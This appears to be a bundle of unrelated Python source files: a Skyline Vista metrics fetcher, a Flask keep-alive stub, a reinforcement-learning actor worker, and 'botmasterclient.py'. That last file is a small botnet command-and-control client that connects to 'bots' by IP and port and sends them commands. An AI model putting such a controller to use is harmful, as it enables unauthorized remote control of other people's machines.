except AttributeError:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
last_vista_metric_resolution = False
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: retrieving Redis key %s data - %s' % (
str(cache_key), str(e)))
last_vista_metric_resolution = False
if remote_target in vista_unique_metrics and last_flux_timestamp:
last_expected_fetch_time = time_now - (frequency + 420)
if last_flux_timestamp < last_expected_fetch_time:
# @added 20200107 - Task #3376: Enable vista and flux to deal with lower frequency data
# Added older_than_resolution
older_than_resolution = True
if last_vista_metric_resolution:
try:
last_expected_data_time = time_now - (frequency + 420 + last_vista_metric_resolution)
if last_flux_timestamp > last_expected_data_time:
older_than_resolution = False
except:
logger.error(traceback.format_exc())
logger.error('error :: fetch :: failed determining last_expected_data_time')
# @modified 20200107 - Task #3376: Enable vista and flux to deal with lower frequency data
# Added older_than_resolution
# if populate_at_resolutions:
if populate_at_resolutions and older_than_resolution:
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
pre_populate_graphite_metric = True
behind_by_seconds = time_now - last_flux_timestamp
logger.info('fetcher :: last_flux_timestamp is behind by %s seconds, attempting to pre-populate %s' % (
str(behind_by_seconds), metric))
if remote_target in vista_unique_metrics:
if not last_flux_timestamp:
if populate_at_resolutions:
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
pre_populate_graphite_metric = True
# Problem with asyncio so using Flux directly
if remote_target in vista_unique_metrics and last_flux_timestamp and USE_FLUX:
if populate_at_resolutions:
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
pre_populate_graphite_metric = True
if pre_populate_graphite_metric:
logger.info('fetcher :: attempting to build the pre-populate Graphite metric urls - %s' % (
metric))
if LOCAL_DEBUG:
logger.info('fetcher :: pre_populate_graphite_metric - %s - %s' % (
str(pre_populate_graphite_metric), metric))
fetch_resolution_urls = []
# Build remote Graphite URLs
if remote_host_type == 'graphite' and pre_populate_graphite_metric:
logger.info('fetcher :: building the pre-populate Graphite metric urls - %s' % (
metric))
try:
# Build URLs to submit to flux/HttpPopulateMetric
resolutions = []
for resolution in populate_at_resolutions:
resolutions.append(resolution)
number_of_resolutions = len(resolutions)
current_resolution_count = 0
for resolution in resolutions:
append_url = True
if current_resolution_count < (number_of_resolutions - 1):
resolution_url = None
if current_resolution_count == 0:
next_resolution_count = 1
else:
next_resolution_count = current_resolution_count + 1
next_resolution = resolutions[next_resolution_count]
# If there is a known last_flux_timestamp only get data
# from that time period until now
if last_flux_timestamp:
if 'days' in resolution:
resolution_days = resolution.strip('days')
resolution_hours = int(resolution_days) * 24
d = datetime.today() - timedelta(hours=resolution_hours)
if 'hours' in resolution:
resolution_hours = int(resolution.strip('hours'))
d = datetime.today() - timedelta(hours=resolution_hours)
resolution_timestamp = int(d.strftime('%s'))
if resolution_timestamp < last_flux_timestamp:
append_url = False
else:
append_url = True
# If the last_flux_timestamp falls within
# the range of the resolution period, append
# otherwise the fill will leave an airgap in
# the data
if 'days' in next_resolution:
next_resolution_days = next_resolution.strip('days')
next_resolution_hours = int(next_resolution_days) * 24
d = datetime.today() - timedelta(hours=next_resolution_hours)
if 'hours' in next_resolution:
next_resolution_hours = int(next_resolution.strip('hours'))
d = datetime.today() - timedelta(hours=next_resolution_hours)
next_resolution_timestamp = int(d.strftime('%s'))
if last_flux_timestamp in range(resolution_timestamp, next_resolution_timestamp):
append_url = True
resolution_url = '%s/render/?from=-%s&until=-%s&format=json&target=%s' % (
str(remote_graphite_host), str(resolution),
str(next_resolution), str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
else:
resolution_url = '%s/render/?from=-%s&until=-%s&format=json&target=%s' % (
str(remote_graphite_host), str(resolution),
str(next_resolution), str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
current_resolution_count += 1
else:
if last_flux_timestamp:
if 'days' in resolution:
resolution_days = resolution.strip('days')
resolution_hours = int(resolution_days) * 24
d = datetime.today() - timedelta(hours=resolution_hours)
if 'hours' in resolution:
resolution_hours = int(resolution.strip('hours'))
d = datetime.today() - timedelta(hours=resolution_hours)
resolution_timestamp = int(d.strftime('%s'))
if last_flux_timestamp > resolution_timestamp:
append_url = True
fetch_from_timestamp = last_flux_timestamp - 600
else:
append_url = True
fetch_from_timestamp = resolution_timestamp
resolution_url = '%s/render/?from=%s&format=json&target=%s' % (
str(remote_graphite_host), str(fetch_from_timestamp),
str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
else:
resolution_url = '%s/render/?from=-%s&format=json&target=%s' % (
str(remote_graphite_host), str(resolution),
str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
if append_url:
fetch_resolution_urls.append(resolution_url)
if LOCAL_DEBUG:
logger.info('fetcher :: appended resolution_url - %s - %s' % (
str(resolution_url), metric))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine the required resolutions for values in VISTA_FETCH_METRICS tuple for - %s - %s' % (
str(remote_target), e))
# @added 20200108 - Task #3376: Enable vista and flux to deal with lower frequency data
# Prometheus metrics that use a custom uri cannot be pre populated
if remote_host_type == 'prometheus' and pre_populate_graphite_metric:
if not default_prometheus_uri:
logger.info('fetcher :: cannot pre populate Prometheus metric %s as it uses a custom uri' % (
metric))
pre_populate_graphite_metric = False
# Build remote Prometheus URLs
if remote_host_type == 'prometheus' and pre_populate_graphite_metric:
# Assuming Prometheus only has a single retention (resolution)
try:
start_seconds_ago = 1296000 # default to 15 days
for resolution in populate_at_resolutions:
# Build URL to submit to flux/HttpPopulateMetric
# url encode the Prometheus metric query to handle
# labels and query chars in the URI
if 'm' in resolution:
resolution_int = resolution.strip('m')
start_seconds_ago = int(resolution_int) * 60
if 'h' in resolution:
resolution_int = resolution.strip('h')
start_seconds_ago = (int(resolution_int) * 60) * 60
if 'd' in resolution:
resolution_int = resolution.strip('d')
start_seconds_ago = ((int(resolution_int) * 24) * 60) * 60
if 'w' in resolution:
resolution_int = resolution.strip('w')
start_seconds_ago = (((int(resolution_int) * 7) * 24) * 60) * 60
pop_start_timestamp = end_timestamp - int(start_seconds_ago)
urlencoded_remote_target = quote(remote_target)
# The query_range query does not return more than
# 11000 data points as it is limited as per
# https://github.com/prometheus/prometheus/issues/2253#issuecomment-346288842
# so resample needed to be reintroduced after being
# deleted as the Prometheus query_range was switched
# to
uri = '/api/v1/query_range?query=%s&start=%s&end=%s&step=60s' % (
str(urlencoded_remote_target),
str(pop_start_timestamp), str(end_timestamp))
# Use query endpoint for more than 11000 data points
uri = '/api/v1/query?query=%s[%s]' % (
str(urlencoded_remote_target),
str(resolution))
resolution_url = '%s%s' % (
str(remote_prometheus_host), uri)
fetch_resolution_urls.append(resolution_url)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine the required pre-populate URI for values in VISTA_FETCH_METRICS tuple for - %s - %s' % (
str(populate_at_resolutions), e))
if fetch_resolution_urls:
set_fetch_resolution_urls = set(fetch_resolution_urls)
fetch_resolution_urls = list(set_fetch_resolution_urls)
flux_url = None
try:
# Submit to flux/populate_metric
protocol = 'http://'
flux_url = '%s%s:%s/populate_metric' % (
protocol, str(settings.FLUX_IP),
str(settings.FLUX_PORT))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not build the flux URL - %s' % e)
payload = None
fetch_resolution_urls_str = '"%s"' % fetch_resolution_urls
if fetch_resolution_urls and pre_populate_graphite_metric:
try:
payload = {
'remote_host_type': remote_host_type,
'remote_target': remote_target,
'metric': metric,
'namespace_prefix': namespace_prefix,
'key': settings.FLUX_SELF_API_KEY, 'token': token, 'user': user,
'password': password,
'fetch_resolution_urls': fetch_resolution_urls_str
}
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not build the payload json - %s' % e)
if flux_url and payload:
try:
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: calling %s with payload - %s' % (
flux_url, str(payload)))
response = requests.post(flux_url, json=payload)
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: flux /populate_metric response code - %s' % (
str(response.status_code)))
# @added 20191011 - Task #3258: Reduce vista logging
good_response = False
if response.status_code == 200:
fetcher_sent_to_flux += 1
# @added 20191011 - Task #3258: Reduce vista logging
good_response = True
if response.status_code == 204:
fetcher_sent_to_flux += 1
# @added 20191011 - Task #3258: Reduce vista logging
good_response = True
# @added 20191011 - Task #3258: Reduce vista logging
if not good_response:
logger.error('fetcher :: flux /populate_metric did not respond with 200 or 204, status code - %s for %s' % (
str(response.status_code), flux_url))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not post data to flux URL - %s, data - %s - %s' % (
str(flux_url), str(payload), e))
if not pre_populate_graphite_metric:
if last_flux_timestamp and remote_host_type == 'graphite':
try:
# Best effort to backfill any missing data
url_from = re.sub(r'^.*from=[-]', '', url)
url_period = re.sub(r'&.*', '', url_from)
if 'days' in url_period:
resolution_days = int(url_period.strip('days'))
d = datetime.today() - timedelta(days=resolution_days)
if 'hours' in url_period:
resolution_hours = int(url_period.strip('hours'))
d = datetime.today() - timedelta(hours=resolution_hours)
if 'minutes' in url_period:
resolution_minutes = int(url_period.strip('minutes'))
d = datetime.today() - timedelta(minutes=resolution_minutes)
from_resolution_timestamp = int(d.strftime('%s'))
if from_resolution_timestamp < last_flux_timestamp:
rep_str = url_period
if 'from=-' in url:
rep_str = '-%s' % url_period
fetch_from_timestamp = last_flux_timestamp - 300
url = re.sub(rep_str, str(fetch_from_timestamp), url)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine backfill parameters - %s' % e)
if last_flux_timestamp and remote_host_type == 'prometheus':
try:
# Best effort to backfill any missing data
if default_prometheus_uri:
pop_start_timestamp = int(last_flux_timestamp) - 120
urlencoded_remote_target = quote(remote_target)
uri = '/api/v1/query_range?query=%s&start=%s&end=%s&step=60s' % (
str(urlencoded_remote_target),
str(pop_start_timestamp), str(end_timestamp))
url = '%s%s' % (str(remote_prometheus_host), uri)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine backfill parameters - %s' % e)
metric_to_fetch = [remote_host_type, frequency, remote_target, graphite_target, metric, url, namespace_prefix, api_key, token, user, password]
metrics_to_fetch.append(metric_to_fetch)
if LOCAL_DEBUG:
logger.info('fetcher :: added metric_to_fetch - %s' % str(metric_to_fetch))
if LOCAL_DEBUG:
if metrics_to_fetch:
metrics_to_fetch_count = len(metrics_to_fetch)
logger.info('fetcher :: there are %s metrics in metrics_to_fetch' % str(metrics_to_fetch_count))
if metrics_to_fetch:
# Spawn fetch process/es
pids = []
spawned_pids = []
pid_count = 0
for i in range(1, settings.VISTA_FETCHER_PROCESSES + 1):
if i > len(metrics_to_fetch):
logger.info('fetcher :: WARNING: Skyline Vista fetcher is set for more cores than needed.')
break
try:
p = Process(target=self.fetch_process, args=(i, metrics_to_fetch))
pids.append(p)
pid_count += 1
logger.info('fetcher :: starting %s of %s fetch_process/es' % (str(pid_count), str(settings.VISTA_FETCHER_PROCESSES)))
p.start()
spawned_pids.append(p.pid)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to spawn fetch_process - %s' % e)
# Self monitor processes and terminate if any fetch_process has run
# for longer than VISTA_FETCHER_PROCESS_MAX_RUNTIME seconds
p_starts = time()
while time() - p_starts <= settings.VISTA_FETCHER_PROCESS_MAX_RUNTIME:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('fetcher :: %s fetch_process/es completed in %.2f seconds' % (str(settings.VISTA_FETCHER_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('fetcher :: timed out, killing all fetch_process processes')
for p in pids:
logger.info('fetcher :: killing fetch_process process')
p.terminate()
# p.join()
logger.info('fetcher :: killed fetch_process process')
for p in pids:
if p.is_alive():
logger.info('fetcher :: stopping fetch_process - %s' % (str(p.is_alive())))
p.join()
# Sleep if it went too fast
process_runtime = int(time()) - begin_fetcher_run
metrics_fetched_count = 0
if int(process_runtime) < 60:
next_run = int(begin_fetcher_run) + 60
time_now = int(time())
sleep_for = next_run - time_now
logger.info('fetcher :: sleeping for %s seconds until next fetch' % str(sleep_for))
sleep(sleep_for)
try:
del sleep_for
except:
logger.error('error :: fetcher :: failed to del sleep_for')
try:
del next_run
except:
logger.error('error :: fetcher :: failed to del next_run')
try:
del time_now
except:
logger.error('error :: fetcher :: failed to del time_now')
metrics_fetched = []
# metrics_fetched_count = 0
try:
redis_set = 'vista.fetcher.metrics.fetched'
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# metrics_fetched = self.redis_conn.smembers(redis_set)
metrics_fetched = self.redis_conn_decoded.smembers(redis_set)
metrics_fetched_count = len(list(metrics_fetched))
logger.info('fetcher :: %s metrics were fetched' % str(metrics_fetched_count))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not get Redis set %s' % redis_set)
redis_set = 'vista.worker.to.process'
try:
redis_set = 'vista.fetcher.metrics.fetched'
self.redis_conn.delete(redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not delete the Redis set %s' % redis_set)
if metrics_fetched:
timestamps = []
for str_metric_fetched in metrics_fetched:
try:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn_decoded
# if python_version == 3:
# str_metric_fetched = str_metric_fetched.decode('UTF-8')
metric_fetched = literal_eval(str_metric_fetched)
timestamp = int(metric_fetched[1])
timestamps.append(timestamp)
except:
logger.error('error :: fetcher :: failed to determine timestamp from %s' % str(str_metric_fetched))
try:
timestamps.sort()
last_fetch_timestamp = int(timestamps[-1])
time_to_fetch = last_fetch_timestamp - begin_fetcher_run
logger.info('fetcher :: %s metrics fetched this run in %s seconds' % (
str(metrics_fetched_count), str(time_to_fetch)))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to last_fetch_timestamp from timestamps')
try:
redis_set = 'vista.worker.to.process'
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# metrics_count_for_workers = len(list(self.redis_conn.smembers(redis_set)))
metrics_count_for_workers = len(list(self.redis_conn_decoded.smembers(redis_set)))
logger.info('fetcher :: %s of the metrics fetched from this run still need to be processed by a worker' % str(metrics_count_for_workers))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not get Redis set %s' % redis_set)
send_metric_name = '%s.sent_to_flux' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(fetcher_sent_to_flux)))
fetcher_sent_to_flux_str = str(fetcher_sent_to_flux)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_sent_to_flux_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
# @added 20191011 - Feature #3260: vista - fetcher add time_to_fetch metric
# Added time_to_fetch, metrics_to_fetch, metrics_fetched
send_metric_name = '%s.time_to_fetch' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(process_runtime)))
fetcher_time_to_fetch_str = str(process_runtime)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_time_to_fetch_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
metrics_to_fetch_count = len(metrics_to_fetch)
send_metric_name = '%s.metrics_to_fetch' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(metrics_to_fetch_count)))
fetcher_metrics_to_fetch_count_str = str(metrics_to_fetch_count)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_metrics_to_fetch_count_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
send_metric_name = '%s.metrics_fetched' % skyline_app_graphite_namespace
try:
logger.info('fetcher :: sending Graphite - %s, %s' % (
send_metric_name, str(metrics_fetched_count)))
fetcher_metrics_fetched_count_str = str(metrics_fetched_count)
send_graphite_metric(parent_skyline_app, send_metric_name, fetcher_metrics_fetched_count_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not send %s to Graphite' % send_metric_name)
try:
del process_runtime
except:
logger.error('error :: fetcher :: failed to del process_runtime')
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. Pog!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
botmasterclient.py
|
#-*-coding: utf-8-*-
from socket import *
import threading
from os import system, getcwd
from getpass import getpass
from time import sleep
from platform import system as s
class Botmaster:
def __init__(self):
os = s()
if os == "Windows":
self.clean = "cls"
else:
self.clean = "clear"
def conn2bot(self, ip, port):
try:
port = int(port)
except:
print("{} is not a port number.".format(port))
getpass("Press 'enter' to continue...")
return 0
else:
try:
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.connect((ip, port))
except Exception as e:
print("The connection to {} on port {} failed,\n{}".format(ip, port, e))
getpass("Press 'enter' to continue...")
return 0
else:
system(self.clean)
cmd = ""
recvstrings = threading.Thread(target=self.waiting4recv)
recvstrings.daemon = True
recvstrings.start()
print("Input 'exit' to go back.")
while cmd != "exit":
cmd = input(">>>>")
if cmd == "logp":
passw = getpass("Ingresa la contraseña: ")
cmd = "logp {}".format(passw)
if cmd != "exit":
self.sock.send(cmd.encode())
self.sock.close()
sleep(2)
getpass("Press 'enter' to continue...")
def waiting4recv(self):
print("Starting 'waiting4recv' method...")
while True:
try:
r = self.sock.recv(1024).decode()
print("{}\n>>>>".format(r))
except:
print("Closing 'waiting4recv' method.")
return 0
if __name__ == '__main__':
bm = Botmaster()
do = ""
IPs = []
ports = []
while do != "exit":
system(bm.clean)
do = input('''
- B O T M A S T E R -
___________________
[C]onnect to a bot
[S]how register of connections
[exit]
>>>>''')
do = do.lower()
if do == "c":
botip = input("Input the IP of the new bot: ")
IPs.append(botip)
botport = input("Input the port that you are going to use to connect to the bot: ")
ports.append(botport)
bm.conn2bot(botip, botport)
try:
bm.sock.close()
except:
pass
elif do == "s":
count = 0
system("cls")
for i in IPs:
print("-------------------")
print("ip: {}\nport: {}".format(IPs[count], ports[count]))
print("-------------------")
count += 1
getpass("Press 'enter' to continue...")
|
actor_worker.py
|
import signal
import time
from queue import Empty
import numpy as np
import psutil
import torch
from gym.spaces import Discrete, Tuple
from torch.multiprocessing import Process as TorchProcess
from algorithms.base.actor_worker import ActorWorkerBase
from algorithms.dqn.dqn_utils import TaskType, make_env_func, set_gpus_for_process, update_reward_shaping_scheme
from algorithms.appo.policy_manager import PolicyManager
from algorithms.appo.population_based_training import PbtTask
from algorithms.utils.spaces.discretized import Discretized
from utils.timing import Timing
from utils.utils import log, AttrDict, memory_consumption_mb, join_or_kill, set_process_cpu_affinity, set_attr_if_exists
class ActorState:
"""
State of a single actor (agent) in a multi-agent environment.
Single-agent environments are treated as multi-agent with one agent for simplicity.
"""
def __init__(
self, cfg, env, worker_idx, split_idx, env_idx, agent_idx,
traj_tensors, num_traj_buffers,
policy_outputs_info, policy_output_tensors,
pbt_reward_shaping, policy_mgr,
):
self.cfg = cfg
self.env = env
self.worker_idx = worker_idx
self.split_idx = split_idx
self.env_idx = env_idx
self.agent_idx = agent_idx
self.policy_mgr = policy_mgr
self.curr_policy_id = self.policy_mgr.get_policy_for_agent(agent_idx)
self._env_set_curr_policy()
self.traj_tensors = traj_tensors
self.num_traj_buffers = num_traj_buffers
self.policy_output_names = [p.name for p in policy_outputs_info]
self.policy_output_sizes = [p.size for p in policy_outputs_info]
self.policy_output_tensors = policy_output_tensors
self.last_actions = None
self.last_rnn_state = None
self.ready = False
self.num_trajectories = 0
self.rollout_env_steps = 0
self.last_episode_reward = 0
self.last_episode_duration = 0
self.last_episode_true_reward = 0
self.last_episode_extra_stats = dict()
# whether the new episode was started during the current rollout
self.new_episode = False
self.pbt_reward_shaping = pbt_reward_shaping
self.integer_actions = False
if isinstance(env.action_space, (Discrete, Discretized)):
self.integer_actions = True
if isinstance(env.action_space, Tuple):
all_subspaces_discrete = all(isinstance(s, (Discrete, Discretized)) for s in env.action_space.spaces)
if all_subspaces_discrete:
self.integer_actions = True
else:
# tecnhically possible to add support for such spaces, but it's untested
# for now, look at Discretized instead.
raise Exception(
'Mixed discrete & continuous action spaces are not fully supported (should be an easy fix)'
)
def _env_set_curr_policy(self):
"""
Most environments do not need to know index of the policy that currently collects experience.
But in rare cases it is necessary. Originally was implemented for DMLab to properly manage the level cache.
"""
set_attr_if_exists(self.env.unwrapped, 'curr_policy_idx', self.curr_policy_id)
def _on_new_policy(self, new_policy_id):
"""Called when the new policy is sampled for this actor."""
self.curr_policy_id = new_policy_id
# we're switching to a different policy - reset the rnn hidden state
self._reset_rnn_state()
if self.cfg.with_pbt and self.pbt_reward_shaping[self.curr_policy_id] is not None:
update_reward_shaping_scheme(self.env, self.agent_idx, self.pbt_reward_shaping[self.curr_policy_id])
def set_trajectory_data(self, data, traj_buffer_idx, rollout_step):
"""
Write a dictionary of data into a trajectory buffer at the specific location (rollout_step).
:param data: any sub-dictionary of the full per-step data, e.g. just observation, observation and action, etc.
:param traj_buffer_idx: index of the trajectory buffer we're currently using on this worker
:param rollout_step: number of steps since we started the current rollout. When this reaches cfg.rollout
we finalize the trajectory buffer and send it to the learner.
"""
index = (traj_buffer_idx, rollout_step)
self.traj_tensors.set_data(index, data)
def _reset_rnn_state(self):
self.last_rnn_state.fill_(0.0)
def curr_actions(self):
"""
:return: the latest set of actions for this actor, calculated by the policy worker for the last observation
"""
if self.integer_actions:
actions = self.last_actions.type(torch.int32).numpy()
else:
actions = self.last_actions.numpy()
if len(actions) == 1:
actions = actions.item()
return actions
def record_env_step(self, reward, done, info, traj_buffer_idx, rollout_step):
"""
Policy inputs (obs) and policy outputs (actions, values, ...) for the current rollout step
are already added to the trajectory buffer
the only job remaining is to add auxiliary data: rewards, done flags, etc.
:param reward: last reward from the env step
:param done: last value of done flag
:param info: info dictionary
:param traj_buffer_idx: index of the trajectory buffer we're currently using on this worker
:param rollout_step: number of steps since we started the current rollout. When this reaches cfg.rollout
we finalize the trajectory buffer and send it to the learner.
"""
self.traj_tensors['rewards'][traj_buffer_idx, rollout_step][0] = float(reward)
self.traj_tensors['dones'][traj_buffer_idx, rollout_step][0] = done
env_steps = info.get('num_frames', 1)
self.rollout_env_steps += env_steps
self.last_episode_duration += env_steps
if done:
self.new_episode = True
self.last_episode_true_reward = info.get('true_reward', self.last_episode_reward)
self.last_episode_extra_stats = info.get('episode_extra_stats', dict())
def finalize_trajectory(self, rollout_step):
"""
Do some postprocessing after we finished the entire rollout.
The key thing to notice here: we never change the policy that generates the actions in the middle of the
rollout! The policy index (in PBT scenarios) is only changed between rollouts.
This means that a little bit of experience in the beginning of the next rollout can be collected
by another policy. It never matters when rollout << episode_len, but if the rollouts are long and
episodes are short, you might need to address this problem.
An alternative approach to this could be to just stop acting in the environment up until the end of the
rollout, and then mask these skipped frames as "invalid" on the learner. The current approach is much cleaner
though (but not universally applicable).
:param rollout_step: number of steps since we started the current rollout. This should be equal to
cfg.rollout in this function
:return: dictionary with auxiliary information about the trajectory
"""
t_id = f'{self.curr_policy_id}_{self.worker_idx}_{self.split_idx}_{self.env_idx}_{self.agent_idx}_{self.num_trajectories}'
traj_dict = dict(
t_id=t_id, length=rollout_step, env_steps=self.rollout_env_steps, policy_id=self.curr_policy_id,
)
self.num_trajectories += 1
self.rollout_env_steps = 0
if self.new_episode:
new_policy_id = self.policy_mgr.get_policy_for_agent(self.agent_idx)
if new_policy_id != self.curr_policy_id:
self._on_new_policy(new_policy_id)
self._env_set_curr_policy()
self.new_episode = False
return traj_dict
def update_rnn_state(self, done):
"""If we encountered an episode boundary, reset rnn states to their default values."""
if done:
self._reset_rnn_state()
def episodic_stats(self):
stats = dict(reward=self.last_episode_reward, len=self.last_episode_duration)
stats['true_reward'] = self.last_episode_true_reward
stats['episode_extra_stats'] = self.last_episode_extra_stats
report = dict(episodic=stats, policy_id=self.curr_policy_id)
self.last_episode_reward = self.last_episode_duration = self.last_episode_true_reward = 0
self.last_episode_extra_stats = dict()
return report
class VectorEnvRunner:
"""
A collection of environments simulated sequentially.
With double buffering each actor worker holds two vector runners and switches between them.
Without single buffering we only use a single VectorEnvRunner per actor worker.
All envs on a single VectorEnvRunner run in unison, e.g. they all do one step at a time together.
This also means they all finish their rollouts together. This allows us to minimize the amount of messages
passed around.
Individual envs (or agents in these envs in case of multi-agent) can potentially be controlled by different
policies when we're doing PBT. We only start simulating the next step in the environment when
all actions from all envs and all policies are collected. This leaves optimization potential: we can start
simulating some envs right away as actions for them arrive. But usually double-buffered sampling masks
this type of inefficiency anyway. The worker is probably still rendering a previous vector of envs when
the actions arrive.
"""
def __init__(self, cfg, num_envs, worker_idx, split_idx, num_agents, shared_buffers, pbt_reward_shaping):
"""
Ctor.
:param cfg: global system config (all CLI params)
:param num_envs: number of envs to run in this vector runner
:param worker_idx: idx of the parent worker
:param split_idx: index of the environment group in double-buffered sampling (either 0 or 1). Always 0 when
double-buffered sampling is disabled.
:param num_agents: number of agents in each env (1 for single-agent envs)
:param shared_buffers: a collection of all shared data structures used by the algorithm. Most importantly,
the trajectory buffers in shared memory.
:param pbt_reward_shaping: initial reward shaping dictionary, for configuration where PBT optimizes
reward coefficients in environments.
"""
self.cfg = cfg
self.num_envs = num_envs
self.worker_idx = worker_idx
self.split_idx = split_idx
self.rollout_step = 0
self.traj_buffer_idx = 0 # current shared trajectory buffer to use
self.num_agents = num_agents # queried from env
index = (worker_idx, split_idx)
self.traj_tensors = shared_buffers.tensors_individual_transitions.index(index)
self.traj_tensors_available = shared_buffers.is_traj_tensor_available[index]
self.num_traj_buffers = shared_buffers.num_traj_buffers
self.policy_outputs = shared_buffers.policy_outputs
self.policy_output_tensors = shared_buffers.policy_output_tensors[index]
self.envs, self.actor_states, self.episode_rewards = [], [], []
self.pbt_reward_shaping = pbt_reward_shaping
self.policy_mgr = PolicyManager(self.num_agents, self.cfg.num_policies)
def init(self):
"""
Actually instantiate the env instances.
Also creates ActorState objects that hold the state of individual actors in (potentially) multi-agent envs.
"""
for env_i in range(self.num_envs):
vector_idx = self.split_idx * self.num_envs + env_i
# global env id within the entire system
env_id = self.worker_idx * self.cfg.num_envs_per_worker + vector_idx
env_config = AttrDict(
worker_index=self.worker_idx, vector_index=vector_idx, env_id=env_id,
)
# log.info('Creating env %r... %d-%d-%d', env_config, self.worker_idx, self.split_idx, env_i)
env = make_env_func(self.cfg, env_config=env_config)
env.seed(env_id)
self.envs.append(env)
actor_states_env, episode_rewards_env = [], []
for agent_idx in range(self.num_agents):
agent_traj_tensors = self.traj_tensors.index((env_i, agent_idx))
actor_state = ActorState(
self.cfg, env, self.worker_idx, self.split_idx, env_i, agent_idx,
agent_traj_tensors, self.num_traj_buffers,
self.policy_outputs, self.policy_output_tensors[env_i, agent_idx],
self.pbt_reward_shaping, self.policy_mgr,
)
actor_states_env.append(actor_state)
episode_rewards_env.append(0.0)
self.actor_states.append(actor_states_env)
self.episode_rewards.append(episode_rewards_env)
def _process_policy_outputs(self, policy_id):
"""
Process the latest data from the policy worker (for policy = policy_id).
Policy outputs currently include new RNN states, actions, values, logprobs, etc. See shared_buffers.py
for the full list of outputs.
As a performance optimization, all these tensors are squished together into a single tensor.
This allows us to copy them to shared memory only once, which makes a difference on the policy worker.
Here we do torch.split to separate them back into individual tensors.
:param policy_id: index of the policy whose outputs we're currently processing
:return: whether we got all outputs for all the actors in our VectorEnvRunner. If this is True then we're
ready for the next step of the simulation.
"""
all_actors_ready = True
for env_i in range(len(self.envs)):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
actor_policy = actor_state.curr_policy_id
if actor_policy == policy_id:
# via shared memory mechanism the new data should already be copied into the shared tensors
policy_outputs = torch.split(
actor_state.policy_output_tensors,
split_size_or_sections=actor_state.policy_output_sizes,
dim=0,
)
policy_outputs_dict = dict()
new_rnn_state = None
for tensor_idx, name in enumerate(actor_state.policy_output_names):
if name == 'rnn_states':
new_rnn_state = policy_outputs[tensor_idx]
else:
policy_outputs_dict[name] = policy_outputs[tensor_idx]
# save parsed trajectory outputs directly into the trajectory buffer
actor_state.set_trajectory_data(policy_outputs_dict, self.traj_buffer_idx, self.rollout_step)
actor_state.last_actions = policy_outputs_dict['actions']
# this is an rnn state for the next iteration in the rollout
actor_state.last_rnn_state = new_rnn_state
actor_state.ready = True
elif not actor_state.ready:
all_actors_ready = False
# Potential optimization: when actions are ready for all actors within one environment we can execute
# a simulation step right away, without waiting for all other actions to be calculated.
# Can be useful when number of agents per environment is small.
return all_actors_ready
def _process_rewards(self, rewards, env_i):
"""
Pretty self-explanatory, here we record the episode reward and apply the optional clipping and
scaling of rewards.
"""
for agent_i, r in enumerate(rewards):
self.actor_states[env_i][agent_i].last_episode_reward += r
rewards = np.asarray(rewards, dtype=np.float32)
rewards = rewards * self.cfg.reward_scale
rewards = np.clip(rewards, -self.cfg.reward_clip, self.cfg.reward_clip)
return rewards
def _process_env_step(self, new_obs, rewards, dones, infos, env_i):
"""
Process step outputs from a single environment in the vector.
:param new_obs: latest observations from the env
:param env_i: index of the environment in the vector
